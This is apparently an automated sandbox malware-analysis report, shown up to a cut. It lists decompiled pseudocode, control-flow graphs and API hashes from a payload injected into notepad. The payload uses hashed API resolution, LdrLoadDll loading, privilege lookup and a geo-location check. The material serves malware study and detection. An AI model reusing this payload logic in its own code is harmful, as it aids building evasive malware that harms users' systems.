                                                    Uniqueness Score: -1.00%

                                                    Function 00407708 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 217 407708-40770f 218 407711-40775a call 41c9e0 call 41d5c0 call 40ac60 call 4160c0 217->218 219 407766-40776e PostThreadMessageW 217->219 223 40778e-407792 218->223 233 40775c-407764 218->233 221 407770-40778a call 40a3f0 219->221 222 40778d 219->222 221->222 222->223 233->219
                                                    C-Code - Quality: 61%
                                                    			E00407708(signed int __ebx, signed int* __ecx, long _a8) {
				char _v63;
				char _v64;
				void* _t14;
				int _t15;
				long _t25;
				int _t30;
				void* _t33;
				void* _t35;
				signed int _t40;

				asm("popfd");
				_t40 =  *__ecx & __ebx;
				asm("lock push esi");
				asm("loope 0x57");
				_t33 = _t35;
				_v64 = 0;
				E0041C9E0( &_v63, 0, 0x3f);
				E0041D5C0( &_v64, 3);
				_t14 = E0040AC60(_t40, _a8 + 0x20,  &_v64); // executed
				_t15 = E004160C0(_a8 + 0x20, _t14, 0, 0, 0xc4e7b6d6);
				_t30 = _t15;
				if(_t30 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					_t42 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t30(_t25, 0x8003, _t33 + (E0040A3F0(_t42, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












                                                    0x00407708
                                                    0x0040770a
                                                    0x0040770c
                                                    0x0040770f
                                                    0x00407711
                                                    0x0040771f
                                                    0x00407723
                                                    0x0040772e
                                                    0x0040773e
                                                    0x0040774e
                                                    0x00407753
                                                    0x0040775a
                                                    0x0040775d
                                                    0x0040776a
                                                    0x0040776c
                                                    0x0040776e
                                                    0x0040778b
                                                    0x0040778b
                                                    0x0040778d
                                                    0x00407792

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040776A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 3f23bb3c737ff08707a3c4a95a73d0eb0c53856556a8807e6d69a66852011e5c
                                                    • Instruction ID: 3d5f5b9934c717b101e74174524500087f75e88854ce687e6e3f10d6100ee1ef
                                                    • Opcode Fuzzy Hash: 3f23bb3c737ff08707a3c4a95a73d0eb0c53856556a8807e6d69a66852011e5c
                                                    • Instruction Fuzzy Hash: DB012B31A8432877E721A6A48C42FEE775C9F41B54F04012EFE00BA1C1E6A9790583EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407710 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 234 407710-40771f 235 407728-40775a call 41d5c0 call 40ac60 call 4160c0 234->235 236 407723 call 41c9e0 234->236 243 40775c-40776e PostThreadMessageW 235->243 244 40778e-407792 235->244 236->235 246 407770-40778a call 40a3f0 243->246 247 40778d 243->247 246->247 247->244
                                                    C-Code - Quality: 82%
                                                    			E00407710(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041C9E0( &_v67, 0, 0x3f);
				E0041D5C0( &_v68, 3);
				_t12 = E0040AC60(_t30, _a4 + 0x20,  &_v68); // executed
				_t13 = E004160C0(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A3F0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                    0x00407710
                                                    0x0040771f
                                                    0x00407723
                                                    0x0040772e
                                                    0x0040773e
                                                    0x0040774e
                                                    0x00407753
                                                    0x0040775a
                                                    0x0040775d
                                                    0x0040776a
                                                    0x0040776c
                                                    0x0040776e
                                                    0x0040778b
                                                    0x0040778b
                                                    0x00000000
                                                    0x0040778d
                                                    0x00407792

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040776A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 0b8e47dd33048c3222986f524c30b1a8e0c7cbeaaeb081c5baf88ced5fc3f73d
                                                    • Instruction ID: a86de320067088b8f8cb5ec0faf1b7318b3594de9c5643b2e8657df454d3e80d
                                                    • Opcode Fuzzy Hash: 0b8e47dd33048c3222986f524c30b1a8e0c7cbeaaeb081c5baf88ced5fc3f73d
                                                    • Instruction Fuzzy Hash: E401A271A8022877E720A6958C43FFF776C9B05B54F05412AFF04BA1C1E6A8B90647EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040AC60 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 250 40ac60-40ac89 call 41d810 253 40ac8b-40ac8e 250->253 254 40ac8f-40ac9d call 41dc30 250->254 257 40acad-40acbe call 41bf50 254->257 258 40ac9f-40acaa call 41deb0 254->258 263 40acc0-40acd4 LdrLoadDll 257->263 264 40acd7-40acda 257->264 258->257 263->264
                                                    C-Code - Quality: 100%
                                                    			E0040AC60(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041D810( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041DC30(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041DEB0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041BF50(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                    0x0040ac7c
                                                    0x0040ac7f
                                                    0x0040ac84
                                                    0x0040ac89
                                                    0x0040ac93
                                                    0x0040ac98
                                                    0x0040ac9b
                                                    0x0040ac9d
                                                    0x0040aca5
                                                    0x0040acaa
                                                    0x0040acaa
                                                    0x0040acb1
                                                    0x0040acb9
                                                    0x0040acbc
                                                    0x0040acbe
                                                    0x0040acd2
                                                    0x00000000
                                                    0x0040acd4
                                                    0x0040acda
                                                    0x0040ac8e
                                                    0x0040ac8e
                                                    0x0040ac8e

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040ACD2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: f8ac295e407975537513146be1bb5df484d05ea24f2b1d024a619217ac9b3a8d
                                                    • Instruction ID: 7d2d2691d04f913abf86de482769a3f1e23fd1bc718f8c7278f7f3c8543eec58
                                                    • Opcode Fuzzy Hash: f8ac295e407975537513146be1bb5df484d05ea24f2b1d024a619217ac9b3a8d
                                                    • Instruction Fuzzy Hash: FC0152B5D0020DABDB10DBA1DC42FDEB3789B14308F0041A9A908A7281F634EB54CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041B1A3 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 271 41b1a3-41b1a8 272 41b198-41b1a0 271->272 273 41b1aa-41b1ca call 41b9b0 271->273 275 41b1cf-41b1e4 LookupPrivilegeValueW 273->275
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000038,0040DC52,0040DC52,00000038,00000000,?,00409CD5), ref: 0041B1E0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: c779d79db25648cf788ea0da2d5e3bcf39dc541d2f5782382e0d881a5cfe6673
                                                    • Instruction ID: b1dedc979f16b74caf917331ccdd0a16b2eac396301f5a9b62dfe22d0fec585b
                                                    • Opcode Fuzzy Hash: c779d79db25648cf788ea0da2d5e3bcf39dc541d2f5782382e0d881a5cfe6673
                                                    • Instruction Fuzzy Hash: 34F0BEB22002046FD720EFA5DC84EE7776AEF88350F24865AF94C97201C636A852CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041B050 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 288 41b050-41b081 call 41b9b0 RtlFreeHeap
                                                    C-Code - Quality: 100%
                                                    			E0041B050(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc98; // 0xc98
				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                    0x0041b05f
                                                    0x0041b067
                                                    0x0041b07d
                                                    0x0041b081

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00409C63,?,?,00409C63,00000060,00000000,00000000,?,?,00409C63,?,00000000), ref: 0041B07D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: bffc035fc95c7fb6115f2492d24ccf34cd58972b4d8a740086584b169eed1361
                                                    • Instruction ID: 18bc34bdc8a8a025dd8f95242a3faac5137062bc64c9578494f85fc18b85250d
                                                    • Opcode Fuzzy Hash: bffc035fc95c7fb6115f2492d24ccf34cd58972b4d8a740086584b169eed1361
                                                    • Instruction Fuzzy Hash: 1CE012B1210208ABDB14EF89DC49EE737ACEF88750F018159BA085B242CA30E9148AF4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041B1B0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041B1B0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041B9B0( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xcb0,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                    0x0041b1ca
                                                    0x0041b1e0
                                                    0x0041b1e4

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000038,0040DC52,0040DC52,00000038,00000000,?,00409CD5), ref: 0041B1E0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 627355b1c7c0b2f51261f4296627d7e61d18f3edfb04b1bef467ad73c2fbb93e
                                                    • Instruction ID: 9b0f825b135ad0e330760513f85aa2426ec36a092e0589bcf2a73696262f7f31
                                                    • Opcode Fuzzy Hash: 627355b1c7c0b2f51261f4296627d7e61d18f3edfb04b1bef467ad73c2fbb93e
                                                    • Instruction Fuzzy Hash: 77E01AB12002086BD710DF49CC45EE737ADEF88650F118159BA0857241C630E8118AF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040DE00 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 283 40de00-40de19 284 40de1f-40de24 283->284 285 40de1a call 4160c0 283->285 286 40de26-40de27 284->286 287 40de28-40de39 GetUserGeoID 284->287 285->284
                                                    C-Code - Quality: 37%
                                                    			E0040DE00(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t2 = _a4 + 0xbc4; // 0x300488c3
				_t7 = E004160C0(_a4 + 0x20,  *_t2, 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                    0x0040de06
                                                    0x0040de1a
                                                    0x0040de24
                                                    0x0040de2a
                                                    0x0040de39
                                                    0x0040de27
                                                    0x0040de27
                                                    0x0040de27

                                                    APIs
                                                    • GetUserGeoID.KERNEL32(00000010,?,?,?,0041C47A,00000000), ref: 0040DE2A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: User
                                                    • String ID:
                                                    • API String ID: 765557111-0
                                                    • Opcode ID: 144f24e5a539b50c9be6193a4247c02d868f7ed71f4a99d4b063ac81500d11db
                                                    • Instruction ID: 69cc6d2820aba085cee411751e6272000d0ccb627d0ea31548fd7d2101827e92
                                                    • Opcode Fuzzy Hash: 144f24e5a539b50c9be6193a4247c02d868f7ed71f4a99d4b063ac81500d11db
                                                    • Instruction Fuzzy Hash: 71E02B3778030827F620D5E59C82FB6324E9B84708F4484B4F90CEB3C1D5A9E9804054
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041B090 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041B090(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				_t3 = _t5 + 0xca0; // 0xca0
				E0041B9B0( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t3,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                    0x0041b093
                                                    0x0041b0a2
                                                    0x0041b0aa
                                                    0x0041b0b8

                                                    APIs
                                                    • ExitProcess.KERNELBASE(0041C48F,?,?,0041C48F,00000000,00000000), ref: 0041B0B8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: a09f8eadf475b8ef1be715b3f2b550fcaeefb97ce79b4c97c862ae484b1f2ae7
                                                    • Instruction ID: 05fe2936629bfb3434c0e828c1cddaadeb720a4aad8c825b47c6863ec12df94e
                                                    • Opcode Fuzzy Hash: a09f8eadf475b8ef1be715b3f2b550fcaeefb97ce79b4c97c862ae484b1f2ae7
                                                    • Instruction Fuzzy Hash: BED012716002187BD620DB99CC45FD7779CDF45794F154065BA4C5B241C934BA01C7E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00B00080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [Pj
                                                    • API String ID: 0-2289356113
                                                    • Opcode ID: 977dcdef72f1a6d9ccc03eea98cc0574543313852c65f79eb783fc8592a720f3
                                                    • Instruction ID: 33b5e248781f98565fe8b8d36c215b10918742ad7dae99484343abc5bdcd7d2e
                                                    • Opcode Fuzzy Hash: 977dcdef72f1a6d9ccc03eea98cc0574543313852c65f79eb783fc8592a720f3
                                                    • Instruction Fuzzy Hash: 71F06231214348ABDB21AB10CC85F2A7FE9EF95754F14C4D9F8466A1D3D7628811E721
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B226F8 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction ID: fad249e3268e41daf26a34be8086f375db633b0f6526c82041b88057a98e1fb6
                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction Fuzzy Hash: 11F0C221328169BBDB58EF1CAD9667A33D5EB98300F54C0B9ED4DC7261D635DD40C290
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B60101 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction ID: ddb1d08c5f4db260d9e983bd2c577066d6a374cf22f51d775e7616dfab946949
                                                    • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction Fuzzy Hash: 5CF082722502089FCB1CDF05C490BBA37F2EB81715F2440ACF50B9F690D73D9881C654
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B000EA Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29e0cb90716eaddee4c603b9d0994bda038a0b46552b56339e6474af4eb17f21
                                                    • Instruction ID: 1bcc71491b33016086f22b5aaa237577d7bc953fece249245a505c96b9360449
                                                    • Opcode Fuzzy Hash: 29e0cb90716eaddee4c603b9d0994bda038a0b46552b56339e6474af4eb17f21
                                                    • Instruction Fuzzy Hash: 97E0D871544B41CFC310DF14C500B19B7F4FF84B10F104479F40697790D7789A04C952
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B38788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00B38788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00B38460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00B1E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00B3718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00B38460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00B3718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00B38460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00B38460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00B38460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00B3718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00B1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00B12340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00B2E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00B1E2A8(_t322,  &_v68, _v16);
								if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00B2E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00B1E2A8(_t322,  &_v68, _t236);
								if(E00B35553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00B1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00B3718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00B1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00B12340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00B2E679(_v20, _t332);
